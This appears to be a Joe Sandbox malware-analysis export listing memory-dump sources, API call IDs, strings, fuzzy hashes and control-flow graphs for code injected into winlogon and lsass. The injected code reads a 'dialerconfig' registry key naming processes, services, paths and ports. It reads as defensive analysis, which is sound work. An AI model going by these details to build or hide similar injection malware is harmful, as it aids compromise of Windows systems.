                                                Memory Dump Source
                                                • Source File: 00000008.00000002.2638717540.000002EA8A6E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002EA8A6E0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_2ea8a6e0000_winlogon.jbxd
                                                Similarity
                                                • API ID: CurrentImageNonwritable__except_validate_context_record
                                                • String ID: csm$f
                                                • API String ID: 3242871069-629598281
                                                • Opcode ID: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
                                                • Instruction ID: a538edcb9c2ba697377814444eed5fa90c7ab5e1c5f51c75adb5ce8ac331327a
                                                • Opcode Fuzzy Hash: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
                                                • Instruction Fuzzy Hash: B131B1712516808AEF94EF26E84871937A4F740BC8FA585A4BE5F0778CCF38E960C706
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.2636011863.000002EA8A690000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002EA8A690000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_2ea8a690000_winlogon.jbxd
                                                Similarity
                                                • API ID: Heap$Process$Free
                                                • String ID:
                                                • API String ID: 3168794593-0
                                                • Opcode ID: 58c4a46a428cd9431a43c23367012082d3a0a44734d7d4b43a30409f6f14bb0b
                                                • Instruction ID: aa27e8e7f79125f1343d22835281ece34ade0f7b32a1f5d1a5472ae50ee12964
                                                • Opcode Fuzzy Hash: 58c4a46a428cd9431a43c23367012082d3a0a44734d7d4b43a30409f6f14bb0b
                                                • Instruction Fuzzy Hash: 3D11483A654BC892EB94DFA6E84821AB3A0F789F84F044069EB8F03758DF3CE4518701
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.2636011863.000002EA8A690000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002EA8A690000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_2ea8a690000_winlogon.jbxd
                                                Similarity
                                                • API ID: FileType
                                                • String ID: \\.\pipe\
                                                • API String ID: 3081899298-91387939
                                                • Opcode ID: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
                                                • Instruction ID: 7a6ca1c80999430289e0e255be2d5575a816950eb6d131cc4e8ea1efcb847bd8
                                                • Opcode Fuzzy Hash: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
                                                • Instruction Fuzzy Hash: 5F71C2322847C145EFA4DF36D9583AAA790F749B84F488076DE4F43B8CDE38E5048742
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.2636011863.000002EA8A690000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002EA8A690000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_2ea8a690000_winlogon.jbxd
                                                Similarity
                                                • API ID: FileType
                                                • String ID: \\.\pipe\
                                                • API String ID: 3081899298-91387939
                                                • Opcode ID: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
                                                • Instruction ID: c2e2c8a0a7ed10ff9d7c15d703bcdc96fdab8d058a3a444099dde12b3b917ad9
                                                • Opcode Fuzzy Hash: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
                                                • Instruction Fuzzy Hash: F651C5322887C142EFA4DE39D55C36AA691F395B80F088075CE8F43F9DCA3DE4058B42
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.2636011863.000002EA8A690000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002EA8A690000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_2ea8a690000_winlogon.jbxd
                                                Similarity
                                                • API ID: ErrorFileLastWrite
                                                • String ID: U
                                                • API String ID: 442123175-4171548499
                                                • Opcode ID: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
                                                • Instruction ID: fd184c2efed707c6206db00b1476f8f653f07e565882e92135d22bf5a263b94d
                                                • Opcode Fuzzy Hash: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
                                                • Instruction Fuzzy Hash: B541C472754A8081EFA0DF25E4483AAB7A0F798794F454035EE4E8779CEB3CE541DB41
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.2636011863.000002EA8A690000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002EA8A690000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_2ea8a690000_winlogon.jbxd
                                                Similarity
                                                • API ID: Stringtry_get_function
                                                • String ID: LCMapStringEx
                                                • API String ID: 2588686239-3893581201
                                                • Opcode ID: 8d086b69a67710f16bbac061c243311228bfa9ac644515e4c5b930ef6255b9c6
                                                • Instruction ID: e9967a6faf523a4465f8fbc59a11bb6c3ef7598bbdaa2fcf69ef1fd245409858
                                                • Opcode Fuzzy Hash: 8d086b69a67710f16bbac061c243311228bfa9ac644515e4c5b930ef6255b9c6
                                                • Instruction Fuzzy Hash: C8111D36608BC086DBA0CB15F88429AB7A4F7C9B90F544176EE8E83B5DDF38D450CB00
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.2636011863.000002EA8A690000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002EA8A690000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_2ea8a690000_winlogon.jbxd
                                                Similarity
                                                • API ID: ExceptionFileHeaderRaise
                                                • String ID: csm
                                                • API String ID: 2573137834-1018135373
                                                • Opcode ID: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
                                                • Instruction ID: 3ef8e3cf5ffba142c337f469f2c331b3eb387ccd0eda3412027d9d972781c63a
                                                • Opcode Fuzzy Hash: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
                                                • Instruction Fuzzy Hash: AD111C36218BC082EFA1CF15E44425AB7A5F788B98F188261DF8E07B68DF3CD555CB00
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.2636011863.000002EA8A690000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002EA8A690000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_2ea8a690000_winlogon.jbxd
                                                Similarity
                                                • API ID: CountCriticalInitializeSectionSpintry_get_function
                                                • String ID: InitializeCriticalSectionEx
                                                • API String ID: 539475747-3084827643
                                                • Opcode ID: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
                                                • Instruction ID: 3dcfd634d21ba109975813ae23278bd7e87620fd4f5aa7bec3cb40b24832763a
                                                • Opcode Fuzzy Hash: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
                                                • Instruction Fuzzy Hash: 3EF0BE253507D081EE84EB41F8082942360EB88B90F4890B1AA5F03B5DCE3CE894DB02
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.2635017926.000002EA8A660000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002EA8A660000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_2ea8a660000_winlogon.jbxd
                                                Similarity
                                                • API ID: try_get_function
                                                • String ID: November$October
                                                • API String ID: 2742660187-1636048786
                                                • Opcode ID: fdce6644ec914193c36bb80fdc4676b7f0aefee418b5ba3fb3fb30fec7b157a7
                                                • Instruction ID: 9bf7f2595c637e6ce5aec44b6edb03a55e5d6912680e34b5d78f5ca36353a619
                                                • Opcode Fuzzy Hash: fdce6644ec914193c36bb80fdc4676b7f0aefee418b5ba3fb3fb30fec7b157a7
                                                • Instruction Fuzzy Hash: F6E092712919C192EF85EB92F84C2E423629B98740F5951B2961F0665ECE38E8868742
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.2638717540.000002EA8A6E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002EA8A6E0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_2ea8a6e0000_winlogon.jbxd
                                                Similarity
                                                • API ID: try_get_function
                                                • String ID: November$October
                                                • API String ID: 2742660187-1636048786
                                                • Opcode ID: fdce6644ec914193c36bb80fdc4676b7f0aefee418b5ba3fb3fb30fec7b157a7
                                                • Instruction ID: ac630fe7209f2f2623aaf96e66dd013462e14f33e34b521b596fee436c1c39d3
                                                • Opcode Fuzzy Hash: fdce6644ec914193c36bb80fdc4676b7f0aefee418b5ba3fb3fb30fec7b157a7
                                                • Instruction Fuzzy Hash: 2FE022612806C192EF84EB11F40C2E423209B84350F6950B1B61F0665ECE38E8928343
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.2636011863.000002EA8A690000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002EA8A690000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_2ea8a690000_winlogon.jbxd
                                                Similarity
                                                • API ID: Valuetry_get_function
                                                • String ID: FlsSetValue
                                                • API String ID: 738293619-3750699315
                                                • Opcode ID: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
                                                • Instruction ID: 65096851b176616538e16ec35cef30521fd5aefe84949005b545887b2a3e0ed0
                                                • Opcode Fuzzy Hash: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
                                                • Instruction Fuzzy Hash: 6EE06D612406C1D1EE84DB60F80C6946322AB88780F4C90B2D91F0629ECE3CF855D702
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.2636011863.000002EA8A690000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002EA8A690000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_2ea8a690000_winlogon.jbxd
                                                Similarity
                                                • API ID: Heap$Process$AllocFree
                                                • String ID:
                                                • API String ID: 756756679-0
                                                • Opcode ID: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
                                                • Instruction ID: 7f1436bbda5468e2430b285601fe1896a77bd5c8b730eeeaaa4c1ff92e47dd08
                                                • Opcode Fuzzy Hash: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
                                                • Instruction Fuzzy Hash: 7E21A736644BD081EF91CF59E40825AF3A0FB84B94F594120DE8E47B28EF7CE5468701
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.2636011863.000002EA8A690000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002EA8A690000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_2ea8a690000_winlogon.jbxd
                                                Similarity
                                                • API ID: Heap$AllocProcess
                                                • String ID:
                                                • API String ID: 1617791916-0
                                                • Opcode ID: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
                                                • Instruction ID: c8f31c423029552b4e838745c61b5a2d1be4ecb255ab9d17500941c7e43ef972
                                                • Opcode Fuzzy Hash: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
                                                • Instruction Fuzzy Hash: 2BE06575A51A4186EB48CFA2D80834A76E1FB88F01F48C024C90E07364DF7DA89ADB81

                                                Execution Graph

                                                Execution Coverage:1.2%
                                                Dynamic/Decrypted Code Coverage:0%
                                                Signature Coverage:0%
                                                Total number of Nodes:121
                                                Total number of Limit Nodes:13
                                                execution_graph 14055 1cb338e1c28 14060 1cb338e1650 GetProcessHeap HeapAlloc 14055->14060 14057 1cb338e1c37 14058 1cb338e1c3e Sleep SleepEx 14057->14058 14059 1cb338e15c0 StrCmpIW StrCmpW 14057->14059 14058->14057 14059->14057 14104 1cb338e1274 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14060->14104 14062 1cb338e1678 14105 1cb338e1274 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14062->14105 14064 1cb338e1689 14106 1cb338e1274 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14064->14106 14066 1cb338e1692 14107 1cb338e1274 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14066->14107 14068 1cb338e169b 14069 1cb338e16b6 RegOpenKeyExW 14068->14069 14070 1cb338e16e8 RegOpenKeyExW 14069->14070 14071 1cb338e18ce 14069->14071 14072 1cb338e1727 RegOpenKeyExW 14070->14072 14073 1cb338e1711 14070->14073 14071->14057 14074 1cb338e1762 RegOpenKeyExW 14072->14074 14075 1cb338e174b 14072->14075 14115 1cb338e12c8 RegQueryInfoKeyW 14073->14115 14078 1cb338e1786 14074->14078 14079 1cb338e179d RegOpenKeyExW 14074->14079 14108 1cb338e104c RegQueryInfoKeyW 14075->14108 14082 1cb338e12c8 16 API calls 14078->14082 14083 1cb338e17d8 RegOpenKeyExW 14079->14083 14084 1cb338e17c1 14079->14084 14085 1cb338e1793 RegCloseKey 14082->14085 14087 1cb338e1813 RegOpenKeyExW 14083->14087 14088 1cb338e17fc 14083->14088 14086 1cb338e12c8 16 API calls 14084->14086 14085->14079 14091 1cb338e17ce RegCloseKey 14086->14091 14089 1cb338e1837 14087->14089 14090 1cb338e184e RegOpenKeyExW 14087->14090 14092 1cb338e12c8 16 API calls 14088->14092 14093 1cb338e104c 6 API calls 14089->14093 14094 1cb338e1889 RegOpenKeyExW 14090->14094 14095 1cb338e1872 14090->14095 14091->14083 14096 1cb338e1809 RegCloseKey 14092->14096 14097 1cb338e1844 RegCloseKey 14093->14097 14099 1cb338e18c4 RegCloseKey 14094->14099 14100 1cb338e18ad 14094->14100 14098 1cb338e104c 6 API calls 14095->14098 14096->14087 14097->14090 14101 1cb338e187f RegCloseKey 14098->14101 14099->14071 14102 1cb338e104c 6 API calls 14100->14102 14101->14094 14103 1cb338e18ba RegCloseKey 14102->14103 14103->14099 14104->14062 14105->14064 14106->14066 14107->14068 14109 1cb338e10b9 14108->14109 14110 1cb338e11b5 RegCloseKey 14108->14110 14109->14110 14111 1cb338e10c7 RegEnumValueW 14109->14111 14110->14074 14113 1cb338e111c 14111->14113 14112 1cb338e1149 GetProcessHeap HeapAlloc 14112->14113 14113->14110 14113->14111 14113->14112 14114 1cb338e117f GetProcessHeap HeapFree 14113->14114 14114->14113 14116 1cb338e1499 RegCloseKey 14115->14116 14117 1cb338e1334 GetProcessHeap HeapAlloc 14115->14117 14116->14072 14118 1cb338e1485 GetProcessHeap HeapFree 14117->14118 14119 1cb338e135d RegEnumValueW 14117->14119 14118->14116 14120 1cb338e13af 14119->14120 14120->14118 14120->14119 14122 1cb338e142f lstrlenW GetProcessHeap HeapAlloc StrCpyW 14120->14122 14123 1cb338e13dd GetProcessHeap HeapAlloc 14120->14123 14124 1cb338e1413 GetProcessHeap HeapFree 14120->14124 14125 1cb338e1554 14120->14125 14122->14120 14123->14120 14124->14122 14126 1cb338e156e 14125->14126 14129 1cb338e15a4 14125->14129 14127 1cb338e1585 StrCmpIW 14126->14127 14128 1cb338e158d StrCmpW 14126->14128 14126->14129 14127->14126 14128->14126 14129->14120 14130 1cb338b2908 14131 1cb338b2936 14130->14131 14132 1cb338b2a2b LoadLibraryA 14131->14132 14133 1cb338b2aa7 14131->14133 14132->14131 14134 1cb338e26f0 14136 1cb338e276f 14134->14136 14135 1cb338e2961 14136->14135 14137 1cb338e27d1 GetFileType 14136->14137 14138 1cb338e27f5 14137->14138 14139 1cb338e27df StrCpyW 14137->14139 14150 1cb338e1ab8 GetFinalPathNameByHandleW 14138->14150 14140 1cb338e2804 14139->14140 14144 1cb338e280e 14140->14144 14146 1cb338e28b3 14140->14146 14143 1cb338e3930 StrCmpNIW 14143->14146 14144->14135 14155 1cb338e3930 14144->14155 14158 1cb338e3200 StrCmpIW 14144->14158 14162 1cb338e1e4c 14144->14162 14146->14135 14146->14143 14148 1cb338e3200 4 API calls 14146->14148 14149 1cb338e1e4c 2 API calls 14146->14149 14148->14146 14149->14146 14151 1cb338e1b21 14150->14151 14152 1cb338e1ae2 StrCmpNIW 14150->14152 14151->14140 14152->14151 14153 1cb338e1afc lstrlenW 14152->14153 14153->14151 14154 1cb338e1b0e StrCpyW 14153->14154 14154->14151 14156 1cb338e393d StrCmpNIW 14155->14156 14157 1cb338e3952 14155->14157 14156->14157 14157->14144 14159 1cb338e3249 PathCombineW 14158->14159 14160 1cb338e3232 StrCpyW StrCatW 14158->14160 14161 1cb338e3252 14159->14161 14160->14161 14161->14144 14163 1cb338e1e6c 14162->14163 14164 1cb338e1e63 14162->14164 14163->14144 14165 1cb338e1554 2 API calls 14164->14165 14165->14163 14166 1cb338e21cc 14167 1cb338e21fd 14166->14167 14168 1cb338e22e8 14167->14168 14169 1cb338e231d 14167->14169 14176 1cb338e2221 14167->14176 14170 1cb338e2391 14169->14170 14171 1cb338e2322 14169->14171 14170->14168 14173 1cb338e2396 14170->14173 14187 1cb338e30b4 GetProcessHeap HeapAlloc 14171->14187 14175 1cb338e30b4 11 API calls 14173->14175 14174 1cb338e2263 StrCmpNIW 14174->14176 14178 1cb338e233a 14175->14178 14176->14168 14176->14174 14177 1cb338e228a 14176->14177 14177->14176 14180 1cb338e1d60 14177->14180 14178->14168 14178->14178 14181 1cb338e1d8f GetProcessHeap HeapAlloc 14180->14181 14182 1cb338e1e36 14180->14182 14184 1cb338e1dc5 14181->14184 14182->14177 14183 1cb338e1e18 GetProcessHeap HeapFree 14183->14182 14184->14182 14184->14183 14185 1cb338e1554 2 API calls 14184->14185 14185->14183 14192 1cb338e3107 14187->14192 14188 1cb338e31d1 GetProcessHeap HeapFree 14188->14178 14189 1cb338e31cc 14189->14188 14190 1cb338e315e StrCmpNIW 14190->14192 14191 1cb338e1d60 6 API calls 14191->14192 14192->14188 14192->14189 14192->14190 14192->14191

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 56 1cb338e26f0-1cb338e2774 call 1cb338feca0 59 1cb338e277a-1cb338e277d 56->59 60 1cb338e298f-1cb338e29b2 56->60 59->60 61 1cb338e2783-1cb338e2791 59->61 61->60 62 1cb338e2797-1cb338e27dd call 1cb338e8d50 * 3 GetFileType 61->62 69 1cb338e27f5-1cb338e27ff call 1cb338e1ab8 62->69 70 1cb338e27df-1cb338e27f3 StrCpyW 62->70 71 1cb338e2804-1cb338e2808 69->71 70->71 73 1cb338e28b3-1cb338e28b9 71->73 74 1cb338e280e-1cb338e2827 call 1cb338e3264 call 1cb338e3930 71->74 75 1cb338e28bc-1cb338e28c1 73->75 87 1cb338e2829-1cb338e2858 call 1cb338e3264 call 1cb338e3200 call 1cb338e1e4c 74->87 88 1cb338e285e-1cb338e28a8 call 1cb338feca0 74->88 77 1cb338e28c3-1cb338e28c6 75->77 78 1cb338e28df 75->78 77->78 80 1cb338e28c8-1cb338e28cb 77->80 82 1cb338e28e1-1cb338e28fa call 1cb338e3264 call 1cb338e3930 78->82 80->78 83 1cb338e28cd-1cb338e28d0 80->83 97 1cb338e293b-1cb338e293d 82->97 98 1cb338e28fc-1cb338e292b call 1cb338e3264 call 1cb338e3200 call 1cb338e1e4c 82->98 83->78 86 1cb338e28d2-1cb338e28d5 83->86 86->78 91 1cb338e28d7-1cb338e28dd 86->91 87->60 87->88 88->60 99 1cb338e28ae 88->99 91->78 91->82 102 1cb338e2961-1cb338e2964 97->102 103 1cb338e293f-1cb338e295c call 1cb338e86a0 97->103 98->97 122 1cb338e292d-1cb338e2937 98->122 99->74 108 1cb338e2966-1cb338e296c 102->108 109 1cb338e296e-1cb338e2971 102->109 103->75 108->60 110 1cb338e2973-1cb338e2976 109->110 111 1cb338e298c 109->111 110->111 115 1cb338e2978-1cb338e297b 110->115 111->60 115->111 117 1cb338e297d-1cb338e2980 115->117 117->111 119 1cb338e2982-1cb338e2985 117->119 119->111 121 1cb338e2987-1cb338e298a 119->121 121->60 121->111 122->60 123 1cb338e2939 122->123 123->75
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.2665413756.000001CB338E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CB338E0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1cb338e0000_lsass.jbxd
                                                Similarity
                                                • API ID: FileType
                                                • String ID: \\.\pipe\
                                                • API String ID: 3081899298-91387939
                                                • Opcode ID: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
                                                • Instruction ID: e1da62206d8d2c85a110a5533f3c9e27e638c71e595c66d34b8ae04b2e4e6411
                                                • Opcode Fuzzy Hash: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
                                                • Instruction Fuzzy Hash: CB71B03225A7C181FB28BB2D99C6BEBA790F745F86F443016DD4983B98DF35CA068740

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 124 1cb338e21cc-1cb338e21f7 call 1cb338fece0 126 1cb338e21fd-1cb338e2206 124->126 127 1cb338e2208-1cb338e220c 126->127 128 1cb338e220f-1cb338e2212 126->128 127->128 129 1cb338e2218-1cb338e221b 128->129 130 1cb338e23cd-1cb338e23ed 128->130 131 1cb338e2221-1cb338e2233 129->131 132 1cb338e231d-1cb338e2320 129->132 131->130 135 1cb338e2239-1cb338e224f 131->135 133 1cb338e2391-1cb338e2394 132->133 134 1cb338e2322-1cb338e233c call 1cb338e30b4 132->134 133->130 139 1cb338e2396-1cb338e23a9 call 1cb338e30b4 133->139 134->130 144 1cb338e2342-1cb338e2358 134->144 137 1cb338e2251-1cb338e2261 135->137 138 1cb338e227d-1cb338e2288 call 1cb338e1d28 135->138 137->138 141 1cb338e2263-1cb338e227b StrCmpNIW 137->141 145 1cb338e22a9-1cb338e22bb 138->145 152 1cb338e228a-1cb338e22a2 call 1cb338e1d60 138->152 139->130 151 1cb338e23ab-1cb338e23b3 139->151 141->138 141->145 144->130 150 1cb338e235a-1cb338e2376 144->150 148 1cb338e22bd-1cb338e22bf 145->148 149 1cb338e22cb-1cb338e22cd 145->149 153 1cb338e22c6-1cb338e22c9 148->153 154 1cb338e22c1-1cb338e22c4 148->154 155 1cb338e22d4 149->155 156 1cb338e22cf-1cb338e22d2 149->156 157 1cb338e237a-1cb338e238d 150->157 151->130 158 1cb338e23b5-1cb338e23bd 151->158 152->145 164 1cb338e22a4-1cb338e22a7 152->164 161 1cb338e22d7-1cb338e22da 153->161 154->161 155->161 156->161 157->157 162 1cb338e238f 157->162 163 1cb338e23c0-1cb338e23cb 158->163 165 1cb338e22e8-1cb338e22eb 161->165 166 1cb338e22dc-1cb338e22e2 161->166 162->130 163->130 163->163 164->161 165->130 167 1cb338e22f1-1cb338e22f5 165->167 166->135 166->165 168 1cb338e22f7-1cb338e22fa 167->168 169 1cb338e230c-1cb338e2318 167->169 168->130 170 1cb338e2300-1cb338e2305 168->170 169->130 170->167 171 1cb338e2307 170->171 171->130
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.2665413756.000001CB338E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CB338E0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1cb338e0000_lsass.jbxd
                                                Similarity
                                                • API ID: Heap$Process$AllocFree
                                                • String ID: S$dialer
                                                • API String ID: 756756679-3873981283
                                                • Opcode ID: a6338c422d047c8eae01fcbeb907d454b031cf1b87c932ac2c197f7c23e38add
                                                • Instruction ID: 4f7d307c0559e335cd0b5f09cbb4e9318dad46cc2eb0de8c292a65f9696b20b2
                                                • Opcode Fuzzy Hash: a6338c422d047c8eae01fcbeb907d454b031cf1b87c932ac2c197f7c23e38add
                                                • Instruction Fuzzy Hash: 4751E732B567A892F760DF699882EEF63A4F744F96F04A411DE45A3B54DB34C842C710

                                                Control-flow Graph

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.2665413756.000001CB338E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CB338E0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1cb338e0000_lsass.jbxd
                                                Similarity
                                                • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                • API String ID: 106492572-2879589442
                                                • Opcode ID: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
                                                • Instruction ID: 0019091451c72e0d27f0948c5f081a123cf8ac8bd120305a2c39b47c9ea8070c
                                                • Opcode Fuzzy Hash: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
                                                • Instruction Fuzzy Hash: 7C711B76756A9086FB109F66E8C2ADE67A4F784F8AF402112DE4D87B28DF79C446C700

                                                Control-flow Graph

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.2665413756.000001CB338E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CB338E0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1cb338e0000_lsass.jbxd
                                                Similarity
                                                • API ID: FinalHandleNamePathlstrlen
                                                • String ID: \\?\
                                                • API String ID: 2719912262-4282027825
                                                • Opcode ID: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
                                                • Instruction ID: c5722bb5e5064a267038efca45cdf4e0eea18f6f5f6f0b8e3e8f0b68a3711c8c
                                                • Opcode Fuzzy Hash: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
                                                • Instruction Fuzzy Hash: A8F0A43230968192F7608B24F4D6BDB6760F784F8AF849030CE4886754DF7DC68ACB00

                                                Control-flow Graph

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.2665413756.000001CB338E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CB338E0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1cb338e0000_lsass.jbxd
                                                Similarity
                                                • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                • String ID:
                                                • API String ID: 1683269324-0
                                                • Opcode ID: c29ba6944873534deeb84ee6eea4394d78c713a8ee642426403de072192bf5b7
                                                • Instruction ID: e4a43e32bc5de21c8982efc44c6a066844a9186fa7c4a81fd91a78ebf9ea1ecd
                                                • Opcode Fuzzy Hash: c29ba6944873534deeb84ee6eea4394d78c713a8ee642426403de072192bf5b7
                                                • Instruction Fuzzy Hash: 9311A5316AE6C142F7219729F4C7FE72290BB64F0BF4430259D05C5394EFB9C9868310

                                                Control-flow Graph

                                                APIs
                                                  • Part of subcall function 000001CB338E1650: GetProcessHeap.KERNEL32 ref: 000001CB338E165B
                                                  • Part of subcall function 000001CB338E1650: HeapAlloc.KERNEL32 ref: 000001CB338E166A
                                                  • Part of subcall function 000001CB338E1650: RegOpenKeyExW.ADVAPI32 ref: 000001CB338E16DA
                                                  • Part of subcall function 000001CB338E1650: RegOpenKeyExW.ADVAPI32 ref: 000001CB338E1707
                                                  • Part of subcall function 000001CB338E1650: RegCloseKey.ADVAPI32 ref: 000001CB338E1721
                                                  • Part of subcall function 000001CB338E1650: RegOpenKeyExW.ADVAPI32 ref: 000001CB338E1741
                                                  • Part of subcall function 000001CB338E1650: RegCloseKey.ADVAPI32 ref: 000001CB338E175C
                                                  • Part of subcall function 000001CB338E1650: RegOpenKeyExW.ADVAPI32 ref: 000001CB338E177C
                                                  • Part of subcall function 000001CB338E1650: RegCloseKey.ADVAPI32 ref: 000001CB338E1797
                                                  • Part of subcall function 000001CB338E1650: RegOpenKeyExW.ADVAPI32 ref: 000001CB338E17B7
                                                  • Part of subcall function 000001CB338E1650: RegCloseKey.ADVAPI32 ref: 000001CB338E17D2
                                                  • Part of subcall function 000001CB338E1650: RegOpenKeyExW.ADVAPI32 ref: 000001CB338E17F2
                                                • Sleep.KERNEL32 ref: 000001CB338E1C43
                                                • SleepEx.KERNELBASE ref: 000001CB338E1C49
                                                  • Part of subcall function 000001CB338E1650: RegCloseKey.ADVAPI32 ref: 000001CB338E180D
                                                  • Part of subcall function 000001CB338E1650: RegOpenKeyExW.ADVAPI32 ref: 000001CB338E182D
                                                  • Part of subcall function 000001CB338E1650: RegCloseKey.ADVAPI32 ref: 000001CB338E1848
                                                  • Part of subcall function 000001CB338E1650: RegOpenKeyExW.ADVAPI32 ref: 000001CB338E1868
                                                  • Part of subcall function 000001CB338E1650: RegCloseKey.ADVAPI32 ref: 000001CB338E1883
                                                  • Part of subcall function 000001CB338E1650: RegOpenKeyExW.ADVAPI32 ref: 000001CB338E18A3
                                                  • Part of subcall function 000001CB338E1650: RegCloseKey.ADVAPI32 ref: 000001CB338E18BE
                                                  • Part of subcall function 000001CB338E1650: RegCloseKey.ADVAPI32 ref: 000001CB338E18C8
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.2665413756.000001CB338E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CB338E0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1cb338e0000_lsass.jbxd
                                                Similarity
                                                • API ID: CloseOpen$HeapSleep$AllocProcess
                                                • String ID:
